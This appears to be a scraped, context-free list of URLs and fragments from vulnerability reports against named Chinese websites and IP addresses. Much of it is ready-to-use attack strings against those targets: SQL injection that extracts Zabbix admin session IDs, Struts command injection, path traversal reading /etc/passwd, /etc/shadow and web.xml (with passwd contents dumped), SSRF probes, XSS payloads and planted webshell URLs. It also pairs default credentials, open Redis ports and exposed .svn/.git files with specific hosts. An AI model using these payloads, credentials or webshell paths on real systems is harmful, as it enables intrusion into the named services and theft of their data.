http://58.220.27.205/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 https://github.com/kvkens/ehaierOnlineTools/blob/4ce2e3afefc7ad53717c2a2479c85d7253905713/controllers/homeController.js http://**.**.**.**/console/login/LoginForm.jsp http://lt-car.ecaic.com http://*.*.*.*/wcm/services/trswcm:SOAPService https://e.chunyuyisheng.com/login.action https://adsy.chunyuyisheng.com/login.action?debug=command&expression=3*2-1 https://e.chunyuyisheng.com/login.action?debug=command&expression=3*2-1 https://e.chunyuyisheng.com/ksi.jsp http://iwatchome.tom.com/ https://github.com/chen52671/MyPythonBox/blob/fc639e4cb4bf724b29bd10f840b66d0d71e577cc/MailSend/mailsend.py http://oa.htfutures.com/ http://htqhoa.com/ http://htqhoa.com:89/manager/admin/login.do http://www.huyi.top/ http://117.121.50.210:8161/admin/ http://ai.iflytek.com:8161/admin/ admin:admin http://117.121.50.210 www.xfyun.cn http://zone.wooyun.org/content/26827 http://**.**.**.**:8090/.svn/wc.db http://**.**.**.**:8090/.svn/pristine/54/54147de0309dbf67abfd209a09cbe541508f8f57.svn-base http://**.**.**.**:8090/.svn/pristine/6c/6c9d2d12321e5d44e986f4ba5a47b2396400ca8a.svn-base http://**.**.**.**:8081/.svn/pristine/f8/f88de23430a626342e404c71399eeb070792ebc9.svn-base http://admin.info.house.sina.com.cn/ http://newoa.xbwl.cn:89/m1/login.do http://oa.xbwl.cn:89/m1/login.do http://oa.xbwl.cn:89/manager/admin/login.do http://logistics.genomics.cn/manager/html https://logistics.genomics.cn/app/app1.jsp http://m.sogou.com/music/musicDownload.jsp?album=%E5%8F%A3%E9%9F%B3&clk=2&keyword=1&lyc=&lyricMatch=yes&p=1&qqdurl=http://cc.stream.qqmusic.qq.com/C100002T2WQy2NIgLS.m4a%3Ffromtag%3D52&s=%E7%AA%A6%E5%94%AF&singer=%E7%AA%A6%E5%94%AF&size=0&title=1&type=%E6%9C%AA%E7%9F%A5&uID=qE_VFO3qxwVsK7Gx&url=http://xxx.com/1&v=2&w=1111 http://xxx.com?xxoo http://xxx.com/2 file:///etc/issue http://xxx.com/%payload file:///etc/issue ftp://xxx.com/%payload http://zone.wooyun.org/content/26651 http://www.263.net/internetstore/sisClient/getBindUserId.action?a=0.04832417261786759&mobile=1888888888*&_=1459418213432 http://www.gevek.com/api/GameApi/editmyself http://sandbox.api.haodai.com/.git/config https://**.**.**.**/jasine/buildpgap/blob/a1156e863638c25657946c0e25fc82a7b022a40f/services/gridService.js https://**.**.**.**,登录成功,这个人属于中科院超级计算中心,搜了下邮箱还有不少关于超级计算中心的文档: http://forum.acg.haier.net/bbs/robots.txt/a.php http://forum.acg.haier.net/bbs/robots.txt/a.php http://apmp.allinpay.com:8080 http://apmp.allinpay.com:8080/ydqzeval/s.jsp?o=index https://116.236.252.101/por/login_psw.csp?rnd=0.6040615672768606 http://123.126.42.32:8089// http://oa.bestv.com.cn/login/Login.jsp?logintype=1 http://oa.bestv.com.cn:89/m1/login.do http://oa.bestv.com.cn:89/manager/admin/login.do http://222.190.108.19/existVendorsAction http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/ http://exp.baidu.com/?r=site/home http://wooyun.org/bugs/wooyun-2016-0198361 http://tiyan.baidu.com http://exp.baidu.com/static/img.php?s=16,40&n=....//....//index.php%00.png https://github.com/billgreen9/timer/blob/7091ed9843497813162cdfe5afb333f82efaefd4/src/main/java/com/tudou/timer/SendMail.java redis://211.150.65.60:6381 redis://211.150.65.60:6380 redis://211.150.65.60:6300 redis://211.150.65.60:6301 http://m.baidu.com/searchbox?action=userx&type=search&service=bdbox&osname=baidubox&data={%22content%22:%2218601350679%22 http://tsz.gfan.com/ http://mall.ch.com/product/search?name=%E5%A4%A9%E5%B0%A7%E6%95%B0%E7%A0%81 http://sqlmap.org http://**.**.**.**/bugs/wooyun-2016-0209082 http://**.**.**.**/ http://**.**.**.**/admin-console/login.seam?conversationId=57 http://demos.qiniu.com/demo/qimage/index.html http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast http://172.30.251.168:9200编码为base64放在image后。 http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast http://172.30.251.168:9200 http://172.30.251.168:1356 http://demos.qiniu.com/demo/qimage/index.html http://**.**.**.**//cmsDeskArticle/bankCardType/1 http://www.mafengwo.cn/sales/union.php?step=preView&pdf=/etc/passwd http://**.**.**.** http://oa.szlng.com.cn/login/Login.jsp?logintype=1 http://oa.szlng.com.cn:89/m1/login.do http://oa.szlng.com.cn:89/manager/admin/login.do http://123.234.41.54:7008/portal/dt/System admin:12345678 https://**.**.**.**/mbsios/localinstallplist jdbc:oracle:thin:@**.**.**.**:1521:mzjz2 jdbc:oracle:thin:@**.**.**.**:1521:orb http://123.234.41.52:7009/manager/html tomcat:tomcat http://**.**.**.**/bugs/wooyun-2016-0210607 www.ganji.com http://www.ganji.com admin:axis2 http://shop.yijia360.com:81/bin.rar http://**.**.**.**/ http://**.**.**.**/art/2016/5/13/art_812270_719011.html http://**.**.**.**/art/2016/5/20/art_812270_736179.html http://eservice.digiwin.com.cn/ http://beian.21vianet.com/----58.83.224.154 http://ssj.gfan.com/ http://ssj.gfan.com/ http://a.readnovel.com/usericon.php?a=load_icon_js&id=45619122,57738912,14444201,13089209,60299748,60299748,27913735,49165864,60308247,4010667,30284734,30284734,4010667,58931113,56685425,12843058,11121284,13429340,60010973,14846534 http://event.readnovel.com/RNfljh/.svn/entries http://event.readnovel.com/rnenter/.svn/entries http://free.readnovel.com/robots.txt/a.php http://www.readnovel.com/robots.txt/a.php http://www.readnovel.com/friendlink.php?url=http%3A%2F%2Fwww.gov.cn%2F%3F1463749061.37 http://big.readnovel.com/search?ranker=ranker&keyword=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&finish_flag=finish_flag&publisherid=1finish_flag http://**.**.**.**/loadproduct.do?author=WT0001&saleman=&UID= http://117.78.23.6:8088/user/gotoLoginPage.action http://**.**.**.**:80/manager/html http://**.**.**.**/wooyun/wooyun.jsp http://www.misuland.com http://**.**.**.**/caissaweb/jsp/login/login.jsp http://**.**.**.**/bugs/wooyun-2010-0178470 http://lib.wap.zol.com.cn/bbs/ios/checkCollect.php?vs=460 http://**.**.**.**/ http://**.**.**.**:2000/存在任意文件上传 http://**.**.**.**:2000/upload?dir=cmVwb3NpdG9yeQ==&name=d3BwMS5qc3A=&start=0&size=7000& http://sso.mojing.cn/user/api/setusername http://wooyun.org/bugs/wooyun-2016-0185816 http://**.**.**.**/bugs/wooyun-2016-0211479/trace/8722c6d1776df3a473e61e3dc44c12f9 http://**.**.**.**/Site/Home/CN http://bbs.xt.ztgame.com/zb/fsb3.php?rt=11&sid=95 http://rdm.iflytek.com:2000/ http://rdm.iflytek.com:2000/upload?dir=cmVwb3NpdG9yeQ==&name=d3BwMS5qc3A=&start=0&size=7000& https://125.88.6.174/logon.jsp http://**.**.**.**/ http://**.**.**.**:8080/WRYJG/STZXGK/show.aspx?NewsID=8 http://b2b.crpjs.net/index.aspx http://b2b.crpjs.net/FCKeditor/editor/filemanager/connectors/test.html# http://www.mafengwo.cn/insurance/ http://admin.pay.sina.com http://admin.pay.sina.com/..//..//..//..//..///etc/passwd https://sqvpn.yundasys.com:8443/vpn/ui/view/index.html?actionId=index https://sqvpn.yundasys.com:8443/vpn/ui/view/index.html?actionId=index http://car.yundasys.com:81/yd_khd/mainfram.php jdbc:oracle:thin:@**.**.**.**:1521:ora8 http://live800.wan.renren.com/live800//sta/export/chatHoursSta.jsp https://**.**.**.**/zhgo116/fancy/blob/32d6bc6a4f35dc6eae8c3cc6890c17289c9533f0/FancyInterface/src/main/java/cn/telling/tools/sendMail/StartMain.java www.tpre.cntaiping.com/index.php/Home/Show/index/cid/20/id/ http://ebooking.elong.com/ http://ebooking.elong.com/ebkcommon/dashboard http://**.**.**.** http://**.**.**.**/DiyFile/image/2016/05/23/15/13850030861-6362e0e4-4b5e-4b91-a1a1-c6e1afa4e466.jsp http://**.**.**.**/DiyFile/image/2016/05/23/15/13850030861-6362e0e4-4b5e-4b91-a1a1-c6e1afa4e466.jsp http://**.**.**.**/pflifeRecommend/login/toLoginUI.do http://note.youdao.com/yws/mapi/xueba?method=getNote http://**.**.**.**/vportal/kd.action open.xiaopi.com/sdk/ajax/isemailexist/ http://pms.xiaopi.com http://china.smart.com/ http://china.smart.com/community/read.php?tid=26563 http://china.smart.com/community/read.php?tid=26563 http://china.smart.com/community/read.php?tid=26563 http://cwc.gzhmu.edu.cn http://cwc.gzhmu.edu.cn:8019/cms/login.jsp http://cwc.gzhmu.edu.cn:8019/cms/system/selectUsers.jsp http://cwc.gzhmu.edu.cn:8019/cms/web/downloadFiles.jsp?file=/etc/shadow http://open.lvgou.com/index/taglist?cat_id=3&cityid=1&pid=2 http://**.**.**.**/test.aspx http://www.ceresearch.cn admin:1a2d3m4i5nx http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?classify=1&flag=fancy&limit=3&order=1&page=1&sort=totalrate&type=0&version=1.1.23.1 http://**.**.**.**/ http://px.open.com.cn/traincenter/centerlist.aspx?ProvinceCode=ZXFL35 http://**.**.**.** http://go.sogou.com http://go.sogou.com/ApiForTicket.php http://go.sogou.com/ApiForTicket.php?callback=&tcity=广州;host http://pic.sogou.com http://pic.sogou.com/ris http://pic.sogou.com/ris?query=http://ssrf.sogou.99fd5e.dnslog.info/hello.jpg&er=3&flag=1 http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/ http://contact.mercedes-benz.com.cn/brochure http://contact.mercedes-benz.com.cn http://retail.mercedes-benz.com.cn/login.aspx http://106.39.111.48:7001/ca/ma3.jsp http://**.**.**.**/ForePage/Skin/NewList1.aspx?ClassId=164&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81 http://**.**.**.**/ForePage/Skin/NewList1.aspx?ClassId=164&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81 https://github.com/landylee1989/faster/blob/ac713f628ba81ef59c8a91c10ca6c2fa437a5815/spec/support/baseapi/acc.rb http://222.73.202.226:9000 http://IP/data/itdb.db http://222.73.202.226:9900/data/files/other-ae-e93c.php http://192.168.220.5 http://192.168.220.179 http://192.168.220.50 http://192.168.220.5 localhost:443 localhost:3456 http://54.183.142.88/ch.php http://54.183.142.88/tunnel.php http://b2c.csair.com/B2C40/modules/bookingnew/manage/login.html http://www.263.net/263/download/ http://cc.263.net/rest/netmeeting/quickLoginNet http://122.96.52.7/login.jsp http://shangjia.ecej.com/init# http://admin.ecej.com https://mail.readnovel.com https://mail.readnovel.com/extmail/cgi/index.cgi https://mail.readnovel.com/extmail/cgi/index.cgi http://app.gwdang.com/app/price_baicai?brand=tcl&class_id=&format=json&img_width=180&keyword=&order_by=&pg=1&ps=20&site_id= http://app.gwdang.com/app/price_baicai?brand=tcl%bf%27%2B%20AND%20%28SELECT%202518%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71787a6271%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x7171787171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29+--+-&class_id=&format=json&img_width=180&keyword=&order_by=&pg=1&ps=20&site_id= http://retail.mercedes-benz.com.cn AS:2048 AS:2048 jdbc:oracle:thin:@**.**.**.**:1521:jswbt http://cc.263.net/login http://cc.263.net/quickLogin http://**.**.**.**/cms/special/specialUrl.aspx http://ting.weibo.com/movieapp/emotion/getversion?display=1 http://ting.weibo.com/movieapp/emotion/getversion?display=1 http://ting.weibo.com/movieapp/emotion/getversion?display=1%20and%201=2 http://ting.weibo.com/movieapp/dialogue/show http://smb.digiwin.com.cn/cms_app/Login.aspx http://**.**.**.**:7009/uddiexplorer/hj.jsp jdbc:oracle:thin:@**.**.**.**:1521:SKSS http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761 http://**.**.**.**/profile/create http://**.**.**.**/data/images/2016/05/22/20160522105415_4611.jsp http://fb.ku6.com/page/submitfb.html http://admin.fb.ku6.com/feedback/toFindFeedbackList.action?qq-pf-to=pcqq.c2c http://admin.fb.ku6.com/tamad3.jsp http://ceagent.ceair.com/ceagent/security/login!authBackFailure.shtml http://**.**.**.**/custom/grzhye.aspx?id0000=1234567890&page=1&xming0=1 http://**.**.**.** http://sakai.fudan.edu.cn/projects/fudan-sakai http://proposal.guohualife.com:8091/proposalproxy/plan/download/20150411100453.pdf?filename=../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin weblogic:x:500:500::/home/weblogic:/bin/bash http://proposal.guohualife.com:8091/proposalproxy/plan/download/20150411100453.pdf?filename=../../../../../../../../../../etc/hosts https://hmall.huazhu.com/member_addressList.html https://hmall.huazhu.com http://m.114piaowu.com/userCenterTrain/userCenterTrain_payTrainOrder.action?orderId=9272363&order_userId=5311555 http://**.**.**.**:8080/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false distcache:x:94:94:Distcache:/:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin uuidd:x:100:102:UUID daemon:/var/lib/libuuid:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash cimsrvr:x:101:500:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin ident:x:98:98::/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin pvm:x:24:24::/usr/share/pvm3:/bin/bash dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin privoxy:x:73:73::/etc/privoxy:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:102:159:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin weblogic:x:801:801::/home/weblogic:/bin/bash http://im.cdzq.com:9901/PersonalPortal/download.jsp?filePath=/upload/b4629ba2-b587-4eb9-85d8-8d87426ca796/../../WEB-INF/web.xml&fileName=web.xml http://www.i21st.cn/ http://www.i21st.cn/z/graduate/upload.php http://www.i21st.cn/z/graduate/upload.20140507.php http://www.i21st.cn/z/graduate/pics/temp/1574678f353e864.03763844.php http://www.i21st.cn http://elt.i21st.cn http://app.i21st.cn http://duxie.i21st.cn http://xuetongshe.i21st.cn http://search.i21st.cn http://m.i21st.cn http://**.**.**.**/bugs/wooyun-2010-0199231 http://**.**.**.**/ caow:caowei http://appapi.yc.ifeng.com/web/qy_comments.php?a=shuping_index&articleid=3 http://www.4008000000.com/ http://www.4008000000.com/downLoad.jsp?filename=../../../WEB-INF/web.xml admin:axis2 encap:Ethernet C8:1F:66:F3:83:1C ca1f:66ff:fef3:831c/64 Scope:Link MTU:1500 packets:277781247 packets:657627130 txqueuelen:1000 AS:2048 AS:2048 AS:2048 http://**.**.**.**:8088/uddiexplorer/out.jsp http://**.**.**.**:8088/uddiexplorer/cc.jsp AS:2048 AS:2048 AS:2048 jdbc:oracle:thin:@**.**.**.**:1521:SZYB http://appapi.yc.ifeng.com/web/store.php?a=announcement&ct=iOS&pos=1 http://appapi.yc.ifeng.com/web/store.php?a=announcement&ct=iOS&pos=1 http://appapi.yc.ifeng.com/web/store.php?a=announcement&ct=iOS&pos=1 http://**.**.**.**/ https://github.com/tianjlj/TJL/blob/b2019f75eae34ee4ed3512974b9a9a8b3cd1087f/Ltest/send_mail.py http://210.38.57.21:82 http://222.85.76.20/custim/cardsim.do?cidcode=1 HELO:10.3.6.0.false AS:2048 HELO:10.3.6.0.false AS:2048 HELO:10.3.6.0.false AS:2048 http://222.85.76.20/uddiexplorer/cc.jsp http://csc.changansuzuki.com:80/csc/include/cspprepair.jsp?vin=BB137768&engine=B7DY48008&configId=24308 https://github.com/dingquantracy/dingquantracy.github.io/blob/d5509aa19a6c75e36a8c7a3c14e5b970233d8806/a.txt www.lufax.com www.lu.com www.lufax.com www.lu.com www.lu.com www.lu.com www.lu.com www.lu.com www.lu.com www.lufax.com www.lu.com www.lu.com http://s9159331849.kuaizhan.com/ http://s9159331849.kuaizhan.com/shop/commodity/VzIJ_VfWPg_mwAv_ data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== http://long.gamebean.com/game_enter.php?s_id=1 http://long.gamebean.com/game_enter.php?s_id=1 http://sqlmap.org http://www.gamebean.com/login.php?ref=long.gamebean.com/dnslist.php http://**.**.**.**/ http://**.**.**.**.cn/ecommerce/proposal/xueping/xuePingController/downloadClause?fileName=..%2FWEB-INF%2Fweb.xml http://www.qu.cn/ http://s.qw.cc/app/mobile.apk?v=339 http://app.a.qu.cn/commentslist/561.html http://app.a.qu.cn/commentslist/561.html http://app.a.qu.cn/commentslist/561.html http://app.a.qu.cn/Ajax/getNewsComment.html http://sqlmap.org http://**.**.**.**:8013/console/ http://**.**.**.**:8013/f/test1.jsp http://**.**.**.**:8013/console/ http://rap.weibo.cn/account/doLogin.do AS:2048 AS:2048 AS:2048 AS:2048 http://**.**.**.**/mkjts/ http://**.**.**.**/MKJSJ/ https://ebank.cbhb.com.cn/webappservice/TP050102.do?FileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://api.m.qu.cn/common/uploading http://**.**.**/ http://**.**.**/1.jsppwd=023&i=ifconfig_ Bcast:168.3.23.2***** feaa:73***** https://vpn.le.com/ https://github.com/xydaxia0/letv-pay-international-scheldule/blob/faa1883e4fc8d9b9ff1fcd67ad0149d72b6698a5/scheldule-server/target/scheldule-server-1.0-SNAPSHOT/WEB-INF/classes/email.properties https://vpn.le.com http://**.**.**.**/index.do http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446 http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446%bf'and-- http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446 http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446%bf'and-- http://**.**.**.**/website.do?service=&area=&page=4 http://**.**.**.**/jycs-index.do?learncenter_id=0982d2ac9663437e8c87acf0218e934e http://**.**.**.**/news-page.do?id=c490e04322484533bb3521bf09125d72 http://**.**.**.**/news-page.do?id=c490e04322484533bb3521bf09125d72%bf'and-- http://59.56.25.29/zabbix http://union.app.sogou.com/index.php/aa.php?s=/Index/login http://sqlmap.org http://**.**.**.**/ http://wooyun.org/bugs/wooyun-2010-0205478 https://api.quyiyuan.com/ms-news/v1/news?newsType=PIC*&pageSize=3&publicServiceType=050000&requestSource=web&serviceType=050000&start=0&token=20160523024254&userSource=0 http://fenqi.pingan.com.cn/pafenqi/ums/umsUser!loginEdit.do http://fenqi.pingan.com.cn/pafenqi/h5/pages/forgetPwd.jsp?mark=1 http://chexian.sinosig.com/unManage/unAgent_forwardUnAgentLogin.action http://oa.fun.tv/seeyon/services/personService?wsdl http://oa.funshion.com/seeyon/services/personService?wsdl http://oa.fun.tv/seeyon/services/authorityService?wsdl http://oa.funshion.com/seeyon/services/authorityService?wsdl http://115.28.28.109/ http://115.28.28.109/api/ad.php?id=12&catid=&name= http://oa.juneyaoair.com//services/ http://oa.juneyaoair.com//services/MobileService SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ SOAP-ENV:Header/ SOAP-ENV:Body SOAP-ENV:Body SOAP-ENV:Envelope http://www.ntjxt.com http://www.ntjxt.com/areas/result?news_title=十一五&area=10&type=1 http://www.ntjxt.com/areas/result?news_title=十一五% http://www.ntjxt.com/areas/result?news_title=十一五% http://**.**.**.**/zzcx/zhiliang/index.htm http://**.**.**.**/zzcx/zhiliang/chaxun.aspx https://mail.ceair.com/owa/ admin:admin http://m.sinosig.com/mobile/index/index!passwordSmsVerify.action AS:2048 AS:2048 AS:2048 AS:2048 http://**.**.**.**:7003/uddiexplorer/cc.jsp MobileGameServices.asmx/GetChannelCodeByProductId http://syjf.data.99.com http://222.190.108.19/addVendorsAction http://mail.new.55bbs.com/ http://**.**.**.**:8083/active/appmodel.action?cn=0&id=50 http://**.**.**/trade/pay/init.doorderId=8341605257418002 coding:utf-8 index.php/index/logout?s=/Index/login http://union.app.sogou.com/ http://**.**.**.**/themis-web/getYearsAction.action http://218.17.224.215:8082/obj/Debug/SFWCFService.dll http://sys.boyibang.com/index.php?s=/Knowledge/postsList/ended/2016-05-28/p/2.html jdbc:oracle:thin:@**.**.**.**:1521:zjhxcs http://bbs.biligame.com/config/config_global.php~ https://vpn.le.com/ http://www.lecommons.com/portal/letv http://us.i.shop.letv.com/ http://ht.letv.cn/ http://10.181.153.72:28080/search1/search.do http://release.letv.cn/user/login.do# http://statistics.letv.cn/ http://aws.leshiren.cn/ http://107.155.53.144/ http://deploy.letv.cn/ http://jira.letv.cn/ http://wiki.letv.cn/ http://cm.letv.cn/ http://10.140.60.134/phpmyadmin/ http://cd.letv.cn/ http://svn2.letv.cn/ http://npm.letv.cn/ http://crowd.letv.cn/ http://svn2.letv.cn/tp/ http://svn2.letv.cn/tp/lecloud/bs/off/trunk/offline/blacklist http://ci.letv.cn/ http://svnweb.letv.cn/ http://prj.letv.cn/ https://github.com/edge-security/edge_mail/blob/07fb54367949a66855c9be4597c04f29466737c4/mlogin.py http://**.**.**.**:7001/defaultroot/login.jsp http://**.**.**.**:7001/defaultroot/xfservices/GeneralWeb www.7gz.com www.7gz.com http://211.100.30.93:8080/axis2 http://211.100.30.93:8080/axis2/she.jsp http://**.**.**.**/ http://**.**.**.**/newjsp/Self_check_report.jsp?style=u4|2 jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:mysql://localhost:3306/dtwb?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&failOverReadOnly=false&maxReconnects=10 http://www.safedog.cn/?a=/*&ArticleID=17329%20union%20select%20xxx%20from%20%20xxx&b=  http://www.safedog.cn/?a=/*&ArticleID=17329%20union%20select%20xxx%20from%20%20xxx&b=*/ http://**.**.**.**/index.action http://**.**.**.**/EmerWS/login.action https://xen.sinosig.com/vpn/index.html http://wenku.baidu.com/view/571385ee7e21af45b307a8de.html?from=search http://wenku.baidu.com/link?url=ud2G-ndGymOXuExmfy2jiUN9E2cGwIfbvX-rDGydAsE9VIqnkySP4KgBII51Zqa2lGY3AC3M81ZM6Zv8LbIAveP_JdmzvoyiBwAeU0OD8Fi http://pan.baidu.com/share/home?uk=3257785095#category/type=0 http://**.**.**//club_register.phpact=check_username&username=aa http://www.oppodigital.com.hk//club_register.php?act=check_username&username=aa http://cms.263.net/ http://cms.263.net/queryContactInfo?ID=37582 http://cms.263.net/control-queryManagerById?magID=478 http://cms.263.net/control-updateManager http://122.113.39.236:8090/ http://zhanzhang.baidu.com/mf/index?site=http://baidu.com user:sys_yzgl http://**.**.**.**/news.do?id=5adbc18f2f2142b8af81e8a28a43fbe7&curCol=newsA_trends http://**.**.**.**/news.do?id=5adbc18f2f2142b8af81e8a28a43fbe7&curCol=newsA_trends http://**.**.**.**/index.html http://h5.jd.com/misc/script/common/?js=../../../../../../../../../../../../../sbin/../etc/././passwd%00f.js http://h5.jd.com/misc/script/?js=../../../../../../../../../../../../../sbin/../etc/././passwd%00f.js http://**.**.**/ http://account.mama.yx.sogou.com:80/account/User/register.do http://fanyi.youdao.com/WebpageTranslate?keyfrom=webfanyi.top&url=http%3A%2F%2F10.100.21.7&type=EN2ZH_CN http://10.100.21.7.xip.io http://www.10.100.21.7.xip.name http://t.im/14tjq http://**.**.**.**/ http://appapi.yc.ifeng.com/web/qy_user.php?a=points_for&auth=c30693d825&ct=iOS&output=json&points=-19&srcid=fenghuang&t=1464570813&token=2157421639&uid=5892933&v=1 http://yuba.douyu.com http://yuba.douyu.com/url/scrapy http://www.baidu.com http://hnc.huawei.com/ http://hnc.huawei.com/web/downloadAction!download.do?relativePath=http://127.0.0.1:22&fileName=123.txt http://service.weibo.com 